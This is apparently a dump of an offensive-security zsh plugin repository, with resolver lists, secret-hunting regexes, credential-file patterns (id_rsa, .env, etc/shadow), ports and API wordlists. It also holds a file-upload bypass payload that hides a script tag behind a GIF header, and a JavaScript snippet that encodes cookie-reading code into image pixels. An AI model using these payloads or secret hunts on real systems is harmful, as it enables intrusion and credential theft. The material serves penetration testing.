205.171.3.26
205.171.2.26
216.146.35.35
216.146.36.36
45.33.97.5
37.235.1.177
37.235.1.174
172.104.237.57
77.88.8.8
77.88.8.1
91.239.100.100
89.233.43.71
74.82.42.42
156.154.70.5
156.154.71.5
45.77.165.194
68.238.120.12
68.238.0.12
207.148.83.241
142.4.204.111
142.4.205.47
149.56.184.112
51.79.68.177
66.70.228.164
172.98.193.42
128.31.0.72
155.138.240.237
================================================
FILE: payloads/secrets-content.json
================================================
{
"flags": "-HnriE",
"patterns": [
"[a-z0-9.-]+\\.s3\\.amazonaws\\.com",
"[a-z0-9.-]+\\.s3-[a-z0-9-]+\\.amazonaws\\.com",
"[a-z0-9.-]+\\.s3-website[.-](eu|ap|us|ca|sa|cn)",
"//s3\\.amazonaws\\.com/[a-z0-9._-]+",
"//s3-[a-z0-9-]+\\.amazonaws\\.com/[a-z0-9._-]+",
"([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,}",
"([^A-Za-z0-9+/]|^)(eyJ|YTo|Tzo|PD[89]|aHR0cHM6L|aHR0cDo|rO0)[%a-zA-Z0-9+/]+={0,2}",
"([^A-Z0-9]|)AKIA[A-Z0-9]{12}([^A-Z0-9]|)",
"[\\s][a-zA-Z0-9]{40}[\\s]",
"aws_secret_access_key.*?[a-zA-Z0-9/\\\\+]{40}",
"amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}",
"EAACEdEose0cBA[0-9A-Za-z]+",
"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\\\"][0-9a-f]{32}['|\\\"]",
"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].*['|\\\"][0-9a-zA-Z]{32,45}['|\\\"]",
"[s|S][e|E][c|C][r|R][e|E][t|T].*['|\\\"][0-9a-zA-Z]{32,45}['|\\\"]",
"[\\s*](token:\\s*)[\\S]{20}",
"gitlab.token[^a-z0-9_]*?[a-z0-9_]{20}([^a-z0-9_]|$)",
"private.token[^a-z0-9_]*?[a-z0-9_]{20}([^a-z0-9_]|$)",
"access.token[^a-z0-9_]*?[a-z0-9_]{20}([^a-z0-9_]|$)",
"[g|G][i|I][t|T][h|H][u|U][b|B].*['|\\\"][0-9a-zA-Z]{35,40}['|\\\"]",
"\"type\": \"service_account\"",
"[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com",
"ya29\\.[0-9A-Za-z\\-_]+",
"AIza[0-9A-Za-z_-]{35}",
"[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}",
"[0-9a-f]{32}-us[0-9]{1,2}",
"key-[0-9a-zA-Z]{32}",
"[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]",
"access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}",
"sk_live_[0-9a-z]{32}",
"(-*)BEGIN .{2,} PRIVATE KEY(-*)",
"SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}",
"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})",
"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}",
"sq0atp-[0-9A-Za-z_-]{22}",
"sq0csp-[0-9A-Za-z_-]{43}",
"sk_live_[0-9a-zA-Z]{24}",
"rk_live_[0-9a-zA-Z]{24}",
"SK[0-9a-fA-F]{32}",
"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[1-9][0-9]+-[0-9a-zA-Z]{40}",
"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*['|\"][0-9a-zA-Z]{35,44}['|\"]",
"deleted",
"security",
"removed",
"test-data",
"prod",
"production"
]
}
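The pattern file above is consumed by grep (its "flags" entry is a grep switch string and "patterns" are extended regular expressions). As an added example, not code from the Quiver repository, the following Python script loads a file of that shape, compiles the patterns, runs them over constructed sample lines the way `grep -Hn -E` would, and masks each hit before reporting it so the report itself does not become a second copy of the secret. Only a handful of the page's patterns are reproduced, and the mapping of `-E` onto Python's `re` dialect is an assumption: the two dialects differ in corners such as `\s` inside bracket expressions, so a pattern that works here should still be checked against grep before it goes into the JSON file.

```python
import json
import re

# Constructed pattern file in the same shape as secrets-content.json above
# ("flags" holds grep switches, "patterns" holds ERE strings). Only a handful
# of the page's patterns are reproduced; the "removed" keyword is included on
# purpose to show how keyword patterns behave next to structured ones.
PATTERN_FILE = json.dumps({
    "flags": "-HnriE",
    "patterns": [
        "([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,}",
        "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})",
        "https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}",
        "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]",
        "sk_live_[0-9a-z]{32}",
        "removed",
    ],
})

# Constructed sample lines standing in for a file under review; the AWS value
# is the documented AWS example key, nothing here is a real credential.
SAMPLE_LINES = [
    "# constructed sample config, not real credentials",
    "aws_access_key_id = AKIAIOSFODNN7EXAMPLE",
    "slack_webhook = https://hooks.slack.com/services/T00000000/B00000000/" + "X" * 24,
    'DATABASE_URL = "postgres://app_user:s3cretpass@db.internal.example:5432/app"',
    "STRIPE_KEY = sk_live_" + "0" * 32,
    "release notes: removed prod credentials from repo",
]


def load_patterns(text):
    """Parse the JSON pattern file and compile its patterns.

    Only the -i switch changes matching semantics; -H, -n and -r are output
    and traversal options for grep, and -E selects the ERE dialect, which
    Python's re accepts for these patterns (an assumption: the dialects are
    not identical, e.g. for \\s inside bracket expressions).
    """
    cfg = json.loads(text)
    switches = cfg.get("flags", "").lstrip("-")
    flags = re.IGNORECASE if "i" in switches else 0
    return [re.compile(p, flags) for p in cfg["patterns"]]


def scan(lines, regexes):
    """Return (line_no, pattern, matched_text) for every hit, like grep -n.

    Patterns such as the AWS one deliberately consume the character before
    the key to anchor on a word boundary, so the match is trimmed.
    """
    findings = []
    for line_no, line in enumerate(lines, start=1):
        for rx in regexes:
            for m in rx.finditer(line):
                findings.append((line_no, rx.pattern, m.group(0).strip()))
    return findings


def mask(value, keep=4):
    """Keep a short prefix for triage and star out the rest, so the report
    does not copy the secret into another log."""
    if len(value) <= keep:
        return "*" * len(value)
    return value[:keep] + "*" * (len(value) - keep)


if __name__ == "__main__":
    for line_no, pattern, hit in scan(SAMPLE_LINES, load_patterns(PATTERN_FILE)):
        print(f"line {line_no}: {mask(hit)}  (pattern: {pattern[:40]})")
```

Running it flags five lines: the AWS key, the Slack webhook, the password embedded in the database URL, the Stripe key, and the "removed" release note. The last hit is the point of including a keyword pattern: words like `removed`, `prod` or `deleted` from the list above are triage hints for commit messages and file names, not secret formats, and they need a human to look at the context before anything is reported.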
================================================
FILE: payloads/secrets-files.json
================================================
{
"flags": "-HnriE",
"patterns": [
"database",
"settings",
"config",
"environment",
"spec",
"zshrc",
"bash",
"npmrc",
"dockercfg",
"pass",
"global",
"credentials",
"connections",
"s3cfg",
"wp-config",
"htpasswd",
"git-credentials",
"id_dsa",
"id_rsa",
"creds",
".*\\.env$",
"\\.agilekeychain$",
"\\.?aws/credentials$",
"^\\.?htpasswd$",
"\\.keychain$",
"\\.cscfg$",
"carrierwave.rb",
"knife.rb",
"\\.?chef/(.*)\\.pem$",
"^(\\.|_)?netrc$",
"credential",
"password",
"^\\.?dbeaver-data-sources.xml$",
"\\.dayone$",
"doctl/config.yaml$",
"settings.py",
"^\\.?dockercfg$",
"^\\.?env$",
"filezilla.xml",
"recentservers.xml",
"^key(store|ring)$",
"^\\.?gitconfig$",
"config/hub$",
"\\.gnucash$",
"credentials.db",
"credentials.json",
"^.*-[a-f0-9]{12}\\.json$",
"\\.?xchat2?/servlist_?\\.conf$",
"\\.?irssi/config$",
"\\.jks$",
"jenkins.plugins.publish_over_ssh.BapSshPublisherPlugin.xml",
"\\.kwallet$",
"^kdbx?$",
".boto",
"adc.json",
"configuration.user.xpl",
"\\.tpm$",
"\\.bek$",
"\\.mdf$",
"\\.sdf$",
"^\\.?muttrc$",
"^\\.?mysql_history$",
"^\\.?npmrc$",
"\\.pcap$",
"omniauth.rb",
"\\.ovpn$",
"config(\\.inc)?\\.php$",
"\\.psafe3$",
"otr.private_key",
"\\.?purple/accounts\\.xml$",
"^\\.?psql_history$",
"^\\.?pgpass$",
"credentials.xml",
"etc/passwd$",
"etc/shadow$",
"LocalSettings.php",
"database.yml",
"\\.pkcs12$",
"\\.p12$",
"\\.pfx$",
"\\.asc$",
"^key(pair)?$",
"\\.pem$",
"journal.txt",
"^.*_rsa$",
"^.*_dsa$",
"^.*_ed25519$",
"^.*_ecdsa$",
"\\.?recon-ng/keys\\.db$",
"\\.rdp$",
"robomongo.json",
"^\\.?irb_history$",
"secret_token.rb",
"\\.?gem/credentials$",
"^\\.?s3cfg$",
"^sftp-config(\\.json)?$",
"^sql(dump)?$",
"\\.sqlite$",
"\\.?ssh/config$",
"Favorites.plist",
"^\\.?(bash_|zsh_)?aliases$",
"^\\.?(bash_|zsh_|sh_|z)?history$",
"^\\.?(bash|zsh|csh)rc$",
".exports",
".functions",
".extra",
"^\\.?(bash_|zsh_)?profile$",
"^\\.?trc$",
"terraform.tfvars",
"^\\.?tugboat$",
"\\.tblk$",
"ventrilo_srv.ini",
"^\\.?gitrobrc$",
"\\.fve$",
"proftpdpasswd",
"^\\.?git-credentials$",
"idea14.key",
"express.conf",
"prod.exs",
"prod.secret.exs",
"logins.json",
".remote-sync.json",
".ftpconfig"
]
}
================================================
FILE: payloads/tcp-ports.txt
================================================
21,22,25,80,88,161,443,445,744,1433,1521,2075,2076,3000,3306,3366,3389,3868,4000,4040,4044,4443,5000,5432,5900,6000,6443,7077,8000,8080,8081,8089,8181,8443,8888,9000,9091,9443,9999,27017,10000,15672
================================================
FILE: payloads/user-agents.txt
================================================
Googlebot/2.1 (+http://www.google.com/bot.html)
Mozilla/5.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148
================================================
FILE: payloads/web-file-upload-bypass-bytes.txt
================================================
JPEG - FF D8 FF DB - ÿØÿÛ
GIF - 47 49 46 38 - GIF8
PNG - 89 50 4E 47 - ‰PNG
================================================
FILE: payloads/web-file-upload-bypass.txt
================================================
Content-Disposition: form-data; name="upload"; filename="badfile.''gif"
Content-Type: image/png
GIF8
<html><script>alert('XSS');</script></html>
================================================
FILE: payloads/wordlist-api.txt
================================================
0
1
2
3
accelerate
accept
account
accounts
acquire
activate
active
adapt
add
address-check
adjust
admin
alert
amount
annotate
anticipate
api
api_auth
apis
apply
archive
arrange
asset
assets
auth
auth_user
balance
balances
bar
baz
bio
bios
build
calculate
cfg
change
channel
chart
check
child
children
claim
class
client
clients
close
collect
comm
comment
comments
common
communicate
company
compare
complete
compose
compute
conf
config
connections
consolidate
construct
contact
contract
coordinate
count
create
credentials
creds
crush
csv
current
custom
customer
customers
damage
dashboard
data
debug
def
default
define
del
delete
deliver
delta
demo
demonstrate
dequeue
derive
design
destroy
details
detect
dev
develop
developers
deviceCatalog
devices
deviceTypes
devise
dir
directory
disable
display
divide
do
dob
docs
documentation
doFor
domain
download
edit
email
employee
enable
err
errors
event
events
explode
export
fabricate
fashion
feed
file
files
filter
foo
forge
form
format
generate
get
github
gmail
go
group
health
help
hidden
history
home
id
image
import
improve
include
info
inform
input
inquiry
insert
install
instances
interpret
item
job
join
json
key
kill
lang
last
level
link
links
list
load
location
lock
log
log_event
login
logins
logout
logs
loop
main
make
manufacturers
map
max
member
members
merchant
merge
metadata
method
methods
metrics
min
mod
money
monitoring
move
multiply
my
name
names
new
next
notifications
notify
oauth
object
objects
open
option
options
order
orders
originate
out
pack
page
pages
panel
parent
parse
pass
password
passwords
permissions
phone
picture
pin
plugin
post
posts
preferences
preserve
preview
print
private
prod
produce
production
profile
profiles
promote
public
put
q
query
queue
queue-jobs
quit
raw
reactivate
read
recite
record
ref
reg
register
release
remove
resend-verification
restore
restrict
retrieve
robots.txt
rss
run
s
sale
sales
save
search
select
send
server
set
setting
settings
setup
show
site
sleep
sort
split
start
state
status
stop
study
sub
summaries
swagger
swagger.json
swagger-resources
swagger-ui.html
table
tags
temp
template
terminate
test
tests
theme
ticket
tmp
token
twitter
type
understand
undo
union
unit
unqueue
update
upgrade
upload
upset
url
use
user
userAccountAssignments
userAssets
userdetails
username
userPreferences
users
v0
v1
v2
v3
validate
vendor
vendors
verify
version
wait
website
work
xml
xmlrpc
yahoo
zip
================================================
FILE: payloads/wordlists.txt
================================================
/usr/share/seclists/Discovery/Web-Content/quickhits.txt
/usr/share/seclists/Discovery/Web-Content/common.txt
/usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt
/usr/share/seclists/Discovery/Web-Content/swagger.txt
/usr/share/seclists/Discovery/Web-Content/graphql.txt
================================================
FILE: quiver.code-workspace
================================================
{
"folders": [
{
"path": "."
}
]
}
================================================
FILE: quiver.plugin.zsh
================================================
#!/usr/bin/env zsh
autoload colors; colors
#############################################################
# quiver
# Author: Steve Mcilwain
# Contributors:
#############################################################
# check for essential packages
dpkg -l | grep -qw rlwrap || sudo apt-get -y install rlwrap
dpkg -l | grep -qw git || sudo apt-get -y install git
# check for directories
mkdir -p $HOME/.quiver/{vars,globals}
#############################################################
# Constants
#############################################################
export __PLUGIN="${0:A:h}"
export __VER=$(cat ${__PLUGIN}/VERSION)
export __LOGFILE="${__PLUGIN}/log.txt"
export __REMOTE_CHK="${__PLUGIN}/remote_checked.txt"
export __REMOTE_VER="${__PLUGIN}/remote_ver.txt"
export __STATUS=$(cd ${__PLUGIN} && git status | grep On | cut -d" " -f2,3)
export __VARS=$HOME/.quiver/vars
export __GLOBALS=$HOME/.quiver/globals
export __PAYLOADS="$__PLUGIN/payloads"
export __SCRIPTS="$__PLUGIN/scripts"
export __TOOLS="$HOME/tools"
#############################################################
# Self Update
#############################################################
__version-check() {
  # query the remote VERSION file at most once a day; the check timestamp lives in __REMOTE_CHK
  local seconds=$((60*60*24*1))
  if test -f "$__REMOTE_CHK" ; then
    if test "$(($(date "+%s")-$(date -f "$__REMOTE_CHK" "+%s")))" -lt "$seconds" ; then
      echo "[*] Version already checked today: $__REMOTE_CHK" >> ${__LOGFILE}
      # return rather than exit: the function is also safe to call directly in the interactive shell
      return 1
    fi
  fi
  date -R > $__REMOTE_CHK
  echo "$(curl -s https://raw.githubusercontent.com/stevemcilwain/quiver/master/VERSION)" > $__REMOTE_VER
  echo "[*] Version checked and stored in: $__REMOTE_VER" >> ${__LOGFILE}
}
(__version-check &)
#############################################################
# Diagnostic Log
#############################################################
echo "Quiver ${__VER} in ${__PLUGIN}" > ${__LOGFILE}
echo " " >> ${__LOGFILE}
echo "[*] loading... " >> ${__LOGFILE}
#Source all qq scripts
for f in ${0:A:h}/modules/qq* ; do
echo "[+] sourcing $f ... " >> ${__LOGFILE}
source $f >> ${__LOGFILE} 2>&1
done
source ${__ALIASES}
# completion enhancement
# zstyle ':completion:*' matcher-list 'r:|[-]=**'
ZSTYLE_ORIG=`zstyle -L ':completion:\*' matcher-list`
ZSTYLE_NEW="${ZSTYLE_ORIG} 'r:|[-]=**'"
eval ${ZSTYLE_NEW}
echo "[*] quiver loaded." >> ${__LOGFILE}
#############################################################
# Shell Log
#############################################################
echo " "
if [[ -f "$__REMOTE_VER" ]]; then
echo "[*] Remote version file exists: $__REMOTE_VER " >> ${__LOGFILE}
rv=$(cat ${__REMOTE_VER})
if [[ ! -z $rv ]]; then
echo "[*] Remote version is |${rv}|" >> ${__LOGFILE}
[[ "$rv" == "$__VER" ]] && __info "Quiver is up to date" || __warn "Quiver update available: $rv, use qq-update to install"
fi
fi
__info "Quiver ${__VER} ZSH plugin loaded "
================================================
FILE: scripts/dns-reverse-brute.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# dns-reverse-brute
#############################################################
#[[ -z $1 ]] && echo -e "[!] Missing argument.\nUsage: zsh $0 <file>" && exit
# for each name in the input file, print it when its A record points into RFC 1918 space
while read domain; do
  if host -t A "$domain" | awk '{print $NF}' | grep -E '^(192\.168\.|172\.1[6789]\.|172\.2[0-9]\.|172\.3[01]\.|10\.)' &>/dev/null; then
    echo $domain
  fi
done < "$1"
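The script above performs live lookups, which makes its classification logic hard to exercise on its own. As an added example (not part of the Quiver repository), the POSIX shell below isolates that logic: the same regular expression decides whether an address is in 10/8, 172.16/12 or 192.168/16, and a second function takes `name ip` pairs on stdin, constructed here to stand in for `host -t A` output, and prints the names that resolve to private space. The host names and addresses are made up; `leaked_names` is a helper added for the example.

```sh
#!/usr/bin/env sh
# Added example: classify resolved addresses as RFC 1918 private space using
# the same expression as dns-reverse-brute.zsh, fed from constructed input
# instead of live DNS so it can be run offline.

PRIVATE_RE='^(192\.168\.|172\.1[6789]\.|172\.2[0-9]\.|172\.3[01]\.|10\.)'

# is_private_ip <ipv4>: exit 0 when the address is in 10/8, 172.16/12 or 192.168/16
is_private_ip() {
    printf '%s\n' "$1" | grep -Eq "$PRIVATE_RE"
}

# private_hosts: reads "<name> <ip>" pairs on stdin and prints the names whose
# address falls in private space (the input stands in for `host -t A` output)
private_hosts() {
    while read -r name ip; do
        [ -n "$name" ] || continue
        if is_private_ip "$ip"; then
            printf '%s\n' "$name"
        fi
    done
}

# Constructed resolution results (not real DNS data); 172.32.0.5 and
# 203.0.113.10 are outside the private ranges and must not be reported.
SAMPLE_RESOLUTIONS='intranet.example.test 10.20.30.40
vpn.example.test 172.31.250.1
www.example.test 203.0.113.10
mail.example.test 172.32.0.5
build.example.test 192.168.1.77'

# leaked_names: comma-separated list of sample names that resolve to private space
leaked_names() {
    printf '%s\n' "$SAMPLE_RESOLUTIONS" | private_hosts | paste -s -d, -
}

leaked_names
```

Public DNS records that point into private ranges are worth knowing about on both sides of an engagement: for a defender they reveal internal naming and addressing that should not have been published. Note that the expression covers only the three RFC 1918 blocks; loopback (127/8), link-local (169.254/16) and carrier-grade NAT (100.64/10) addresses pass through it unflagged.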
================================================
FILE: scripts/image-gen.js
================================================
(function() {
function encode(a) {
if (a.length) {
var c = a.length,
e = Math.ceil(Math.sqrt(c / 3)),
f = e,
g = document.createElement("canvas"),
h = g.getContext("2d");
g.width = e, g.height = f;
var j = h.getImageData(0, 0, e, f),
k = j.data,
l = 0;
for (var m = 0; m < f; m++)
for (var n = 0; n < e; n++) {
var o = 4 * (m * e) + 4 * n,
p = a[l++],
q = a[l++],
r = a[l++];
(p || q || r) && (p && (k[o] = ord(p)), q && (k[o + 1] = ord(q)), r && (k[o + 2] = ord(r)), k[o + 3] = 255)
}
return h.putImageData(j, 0, 0), h.canvas.toDataURL()
}
}
var ord = function ord(a) {
var c = a + "",
e = c.charCodeAt(0);
if (55296 <= e && 56319 >= e) {
if (1 === c.length) return e;
var f = c.charCodeAt(1);
return 1024 * (e - 55296) + (f - 56320) + 65536
}
return 56320 <= e && 57343 >= e ? e : e
},
d = document,
b = d.body,
img = new Image;
var stringenc = "Hello, World!";
img.src = encode(stringenc), b.innerHTML = "", b.appendChild(img)
})();
(function() {
function encode(a) {
if (a.length) {
var c = a.length,
e = Math.ceil(Math.sqrt(c / 3)),
f = e,
g = document.createElement("canvas"),
h = g.getContext("2d");
g.width = e, g.height = f;
var j = h.getImageData(0, 0, e, f),
k = j.data,
l = 0;
for (var m = 0; m < f; m++)
for (var n = 0; n < e; n++) {
var o = 4 * (m * e) + 4 * n,
p = a[l++],
q = a[l++],
r = a[l++];
(p || q || r) && (p && (k[o] = ord(p)), q && (k[o + 1] = ord(q)), r && (k[o + 2] = ord(r)), k[o + 3] = 255)
}
return h.putImageData(j, 0, 0), h.canvas.toDataURL()
}
}
var ord = function ord(a) {
var c = a + "",
e = c.charCodeAt(0);
if (55296 <= e && 56319 >= e) {
if (1 === c.length) return e;
var f = c.charCodeAt(1);
return 1024 * (e - 55296) + (f - 56320) + 65536
}
return 56320 <= e && 57343 >= e ? e : e
},
d = document,
b = d.body,
img = new Image;
var stringenc = "function asd() {\
var d = document;\
var c = 'cookie';\
alert(d[c]);\
};asd();/*Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam aliquam blandit metus vel elementum. Mauris mi tortor, congue eget fringilla id, tempus a tellus. Morbi laoreet vitae ipsum vel dapibus. Nunc eu faucibus ligula. Donec maximus malesuada justo. Nulla congue, risus quis dapibus porttitor, metus quam rutrum dolor, ac maximus nibh metus quis enim. Aenean hendrerit venenatis massa ac gravida. Donec at nisi quis ex sollicitudin bibendum sit amet ac quam.\
Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\
Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\
Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\
Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\
Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\
Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\
Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\
Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\
Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\
Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\
Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\
Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\
Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\
Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\
Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\
